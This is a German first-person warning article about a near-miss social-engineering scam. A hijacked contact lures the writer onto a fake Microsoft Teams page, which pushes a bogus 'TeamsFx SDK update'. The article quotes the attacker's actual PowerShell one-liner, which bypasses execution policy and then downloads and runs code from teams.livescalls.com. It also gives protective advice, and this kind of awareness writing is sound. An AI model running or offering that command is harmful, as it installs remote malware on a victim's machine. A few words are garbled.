Ich wäre beinahe in einem Microsoft Teams-Anruf gehackt worden – So funktioniert der Betrug

Ich möchte Ihnen erzählen, wie ich heute beinahe Opfer eines ausgeklügelten Social-Engineering-Angriffs geworden wäre, der darauf abzielte, etwas so Alltägliches und scheinbar Harmloses wie einen Microsoft Teams-Anruf auszunutzen. 

Während des größten Teils der Interaktion schien nichts Ungewöhnliches vorzuliegen. 

Jemand, den ich für einen Branchenkontakt hielt, kontaktierte mich, um ein Treffen über Microsoft Teams zu vereinbaren, und der hilfsbereite Mitarbeiter in mir freute sich sehr, an dem Anruf teilzunehmen. 

Spoilerwarnung: Die Person am anderen Ende der Leitung war ein Betrüger, der versuchte, mich dazu zu bringen, bösartigen Code auf meinem Computer auszuführen. 

Ich schildere hier die gesamte Erfahrung als Warnung für Freunde, Bekannte und Zeitgenossen in der Krypto- und Web3-Community. 

Heute wäre es fast ich gewesen; morgen könnte es jemand anderes sein. 

Schritt 1: Die Vorbereitung – „Lass uns mal wieder quatschen, alter Freund“ 

Wenn Sie eine SMS vom Telegram-Konto einer Ihnen bekannten Führungskraft einer renommierten Krypto-PR-Agentur erhalten, denken Sie als Letztes daran, dass Sie in eine Phishing-Masche geraten könnten. 

Auch keines der typischen Warnsignale war sofort erkennbar. 

Das war keine zufällige Direktnachricht. 

Ich habe nicht mit einem gefälschten Account gesprochen, bei dem das „i“ subtil durch ein „l“ ersetzt wurde 

Ich hatte sogar schon einen Chatverlauf mit dem Account, deshalb dachte ich, ich hätte am anderen Ende die echte Person vor mir. 

Nichts schien ungewöhnlich, als sie ein völlig freundschaftliches Gespräch begannen, um wieder in Kontakt zu treten. Schon bald folgten ein Calendly-Link zur Buchung eines 30-minütigen Meetings und eine Einladung zu einem Microsoft Teams-Anruf.

Wie ich bereits erwähnte, war ich während des gesamten Gesprächs stets aufmerksam. Ich empfand dieselbe Professionalität und Geduld, die man von einem hochrangigen Mitarbeiter einer führenden PR-Agentur erwarten würde. 

Ich wusste lediglich, dass ich über die Calendly-Seite eines Branchenkontakts ein Teams-Meeting vereinbart hatte.

Der Betrüger nimmt über ein gehacktes Konto Kontakt auf und sendet einen Link zu einem Teams-Meeting.

Schritt 2: Die Falle „Nur auf dem Desktop beitreten“ 

Der Tag des Meetings kam, und ich klickte wie schon unzählige Male zuvor auf den Teams-Meeting-Link auf meinem Handy. Doch anstatt wie üblich direkt ins Meeting zu gelangen, erschien eine Meldung: „Der Zugriff auf dieses Meeting über mobile Geräte ist aufgrund der Organisatoreinstellungen nicht gestattet.“ 

„Oh je! Das ist mir noch nie passiert.“ 

Nun ja, es war auch keindent . 

Im Nachhinein betrachtet war das wohl das erste wirkliche Warnsignal. 

Die Fehlermeldung ist Teil des Designs. Die Betrüger benötigen einen Desktop- oder Laptop-Computer, da ihr Schadprogramm ein Kommandozeilen-Skript ist, das nur auf PCs ausgeführt werden kann.

Die URL im Browser „ teams.livescalls.com“ ist NICHT die echte Microsoft-Domäne.

Für offizielle Teams-Besprechungen werden teams.microsoft.com oder teams.live.com verwendet. 

Die Domain „livescalls.com“ sieht aus der Ferne dem Original recht ähnlich, aber bei genauerem Hinsehen ist sie doch weit vom Original entfernt. 

Die eine ist die von Microsoft kontrollierte Website, die über 320 Millionen täglich aktive Nutzer angibt. Die andere ist eine komplett gefälschte Website, die von den Angreifern kontrolliert wird. 

Fairerweise muss man sagen, dass manche Organisationen für ihre Teammeetings eigene Domains verwenden. Doch die Tatsache, dass laut Weltwirtschaftsforum im Jahr 2025 über eine Billion Dollar an Betrügern verloren gehen könnten, war für mich Grund genug, meine Warnsignale nicht zu ignorieren. 

Die gefälschte Seite „Teamzugriffshinweis“ blockiert den mobilen Zugriff und zwingt die Opfer so zur Nutzung eines Desktop-Computers, auf dem das Schadskript ausgeführt werden kann. Beachten Sie die URL: teams.livescalls.com – keine Microsoft-Domäne.

Der Betrüger setzt das Opfer nach der Sperrung auf Mobilgeräten unter Druck, sich über den Desktop anzumelden, und behauptet, „Partner würden warten“

Schritt 3: Die Nutzlast – „Aktualisieren Sie Ihr TeamsFx SDK“

Auf dem Desktop angekommen, zeigte die gefälschte Teams-Besprechung eine professionell gestaltete Seite, die wie eine offizielle Microsoft-Dokumentation aussah. Sie enthielt sogar Originalformulierungen von Microsoft, die darauf hinwiesen, dass das TeamsFx SDK bis September 2025 veraltet sein wird. 

Die Lösung? Kopieren Sie einen Codeblock und führen Sie ihn in Ihrem Terminal oder Ihrer Eingabeaufforderung aus.

Wenn Sie zusätzlich eine Google-Suche durchführen würden, würden Sie feststellen, dass ein ähnliches SDK existiert. Sie benötigen es jedoch nicht für dieses Team-Meeting. 

Der Code wirkt zunächst harmlos – er setzt Umgebungsvariablen mit offiziell klingenden Namen wie TeamsFx_API_KEY und MS_Teams_API_SECRET. Doch der eigentliche Angriffspunkt liegt irgendwo dazwischen, und diese Angreifer rechnen nicht damit, dass Sie das Problem entdecken:

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

Diese einzelne Zeile umgeht die PowerShell-Sicherheitsrichtlinien (-ep bypass), lädt Code vom Server des Angreifers herunter und führt ihn sofort aus (iex = Invoke-Expression). 

Und so wird jede Malware, jeder Keylogger oder jedes Fernzugriffstool, das die Angreifer gehostet haben, unbemerkt auf Ihrem Gerät installiert.

Die gefälschte Teams-Besprechungsoberfläche zeigt den Teilnehmern die schädliche Seite „TeamsFx SDK-Update“. Beachten Sie die Teilnehmer im Anruf – KI-generierte Videos.

Schritt 4: Die Druckphase „Keine Sorge, es ist sicher“

Als ich Bedenken äußerte, das Skript auszuführen, versuchte der Betrüger sofort, mich zu beruhigen und gleichzeitig unter Druck zu setzen. 

Der Satz „Keine Sorge, es ist ganz einfach und sicher für Sie“ sollte mir helfen, den Anweisungen im Screenshot zu folgen, der mir zeigte, wie ich die Eingabeaufforderung auf meinem PC öffnen kann. 

„Die Partner sind bereits in Zoom beigetreten“, sollte mir das Gefühl geben, nicht alle auf andere Plattformen umstellen zu müssen, weil ich nicht herausfinden konnte, wie man eine einfache Eingabeaufforderung ausführt.

Ich fühlte mich nicht beruhigt. Ich wurde aber auch nicht unter Druck gesetzt.

Als ich vorschlug, das Gespräch auf Google Meet zu verlegen, lehnten sie ab. Offenbar funktioniert ihr Betrug nur über ihr gefälschtes Teams-Konto.

Der Betrüger sendet eine Schritt-für-Schritt-Anleitung zum Ausführen des Schadcodes und versichert dem Opfer: „Keine Sorge, es ist ganz einfach und sicher für Sie.“

Schritt 5: Bluff entlarvt – blockiert und gelöscht

Nachdem ich das Skript und die Domain überprüft hatte, bestätigte sich mein Verdacht: Ich wurde Opfer von Social Engineering und stand kurz davor, in die Statistik des Weltwirtschaftsforums für 2026 aufgenommen zu werden. 

Ich sagte dem Betrüger direkt: „Ich habe es gerade überprüft, und dieser Befehl und die Website sind nicht seriös. Leider kann ich das nicht ausführen.“ Ich bot an, das Gespräch über Google Meet fortzusetzen, falls er weiterhin chatten wollte.

„Aber die Sitzung läuft bereits“, lautete die Nachricht von der anderen Seite. 

Wie erwartet, sollte mir ihre Reaktion die Dringlichkeit der Teilnahme an dem Gespräch verdeutlichen. Schließlich wollte ich all diese Partner nicht zu lange warten lassen.

Kurz darauf löschten sie unsere gesamte Korrespondenz und blockierten mich. 

Ah… Das ist nicht nur ein Warnsignal. Das ist ja wirklich brandgefährlich. 

Geschäftspartner löschen nicht ihren gesamten Gesprächsverlauf und blockieren einen nicht sofort, wenn man eine Softwareaktualisierung in Frage stellt.

Nachdem der Betrug aufgedeckt wurde, behauptet der Angreifer, das Meeting laufe „jetzt“, bevor er alle Nachrichten löscht und das Opfer blockiert.

Wie Sie sich schützen können

Diese Art von Angriff breitet sich in der Krypto-, Web3- und Technologiebranche rasant aus. Betrüger kompromittieren oder imitieren echte Konten von PR-Fachleuten, Investoren und Projektleitern, um gezielt vermögende Personen anzugreifen. So schützen Sie sich:

• Führen Sie niemals Befehle von einer Besprechungsseite aus. Keine seriöse Videokonferenzplattform wird Sie jemals auffordern, Code in Ihr Terminal oder Ihre Eingabeaufforderung einzufügen.
• Überprüfen Sie die URL. Echte Microsoft Teams-Besprechungen finden auf teams.microsoft.com oder teams.live.com statt – nicht auf „teams.livescalls.com“ oder einer ähnlich aussehenden Domain.
• Seien Sie misstrauisch gegenüber Anforderungen, die nur die Nutzung eines Desktop-PCs vorsehen. Wenn ein Meeting den mobilen Zugriff blockiert, handelt es sich wahrscheinlich um eine bewusste Taktik, um Sie an einen Rechner zu bringen, auf dem Skripte ausgeführt werden können.
• Überprüfen Sie die Person über einen anderen Kanal. Wenn Ihnen ein bekannter Kontakt einen ungewöhnlichen Meeting-Link sendet, rufen Sie ihn direkt an oder kontaktieren Sie ihn über eine andere Plattform, um die Identität zu bestätigen.
• Achten Sie auf „powershell -ep bypass“ und „iex“. Das sind die beiden größten Warnsignale in jedem Skript. Ersteres deaktiviert die Sicherheitsvorkehrungen, Letzteres führt heruntergeladenen Code ungeprüft aus.
• Falls Sie das Skript bereits ausgeführt haben: Trennen Sie sofort die Internetverbindung. Führen Sie einen vollständigen Malware-Scan durch (z. B. mit Malwarebytes oder Windows Defender Offline). Ändern Sie alle Passwörter von einem anderen, sauberen Gerät aus. Überwachen Sie Ihre Krypto-Wallets und Bankkonten auf unautorisierte Transaktionen.

Warum das für Krypto und Web3 wichtig ist

Das würde ich nicht als typische Phishing-Interaktion bezeichnen, bei der Angreifer ein weites Netz auswerfen und schauen, was sie an Land ziehen. 

Nein, es handelte sich um eine gezielte, mehrtägige Social-Engineering-Aktion. Die Angreifer gaben sich tagelang als Branchenkollegen aus, bauten Vertrauen auf und versuchten, Sie in einem Teams-Anruf über eine überzeugende gefälschte Microsoft-Seite bei der Behebung eines technischen Problems zu unterstützen. 

Ob sie Ihredentstehlen, Ihre Krypto-Wallet leeren oder persistente Fernzugriffs-Malware installieren – die Angreifer haben alles zu gewinnen und nichts zu verlieren. 

Wenn Sie Gründer, Investor oder anderweitig in der Krypto- und Technologiebranche tätig sind und an Meetings teilnehmen, teilen Sie diesen Artikel mit Ihrem Team. Die Betrüger werden immer raffinierter, und die einzige Verteidigung ist Wachsamkeit.